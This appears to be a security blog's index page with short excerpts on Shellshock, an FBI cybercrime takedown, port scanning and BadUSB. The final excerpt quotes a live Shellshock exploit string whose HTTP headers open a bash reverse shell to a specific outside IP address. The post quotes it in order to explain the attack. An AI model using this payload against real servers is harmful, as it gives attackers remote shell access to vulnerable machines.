Windows administrators were sitting back and watching the Shellshock CVE (Common Vulnerabilities Exposures) fireworks CVE-2014-6277 and CVE-2014-6278 Now that we(Security IT community) are thinking Shellshock … Does windows have a problem as well? First of all let’s define “Shellcode” – as in Projectshellcode.com Shellcode is when one can create a “shell” from the attacked machine and … Read more
Here is a video of the FBI agent and the VP of threat research Dmitri Alperovitch and FBI Supervisory Special Agent Keith Mularski. If you want to just go to the site http://bcove.me/vchfpcni and goto minute 41 where the FBI agent discusses the specific case of infiltrating the Russian cyber crime ring and take it down. … Read more
People are always asking me – “Why should I have you run an Alpha scan for me?” Because a hacker may have been there already – not a “good” ethical hacker, but the Black hat variety: As the Internet Storm Center discusses today: the Infosec community forum post There are certain ports that should not … Read more
What is this BadUSB? Extremetech.com has a story and the Youtube video from BlackHat 2014(not Derbycon as in article) The controller can be hacked and code inserted inside the USB chips themselves. So we have to create good security policies and reduce the chance of plugging in USB devices that we do not know about. … Read more
Google Web Cache of the exploit char *request = “GET %s HTTP/1.0\r\nUser-Agent: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nCookie: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nHost: %s\r\nReferer: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\n\r\n”; which as it is explained in the link (by the hacker) is to run a … Read more
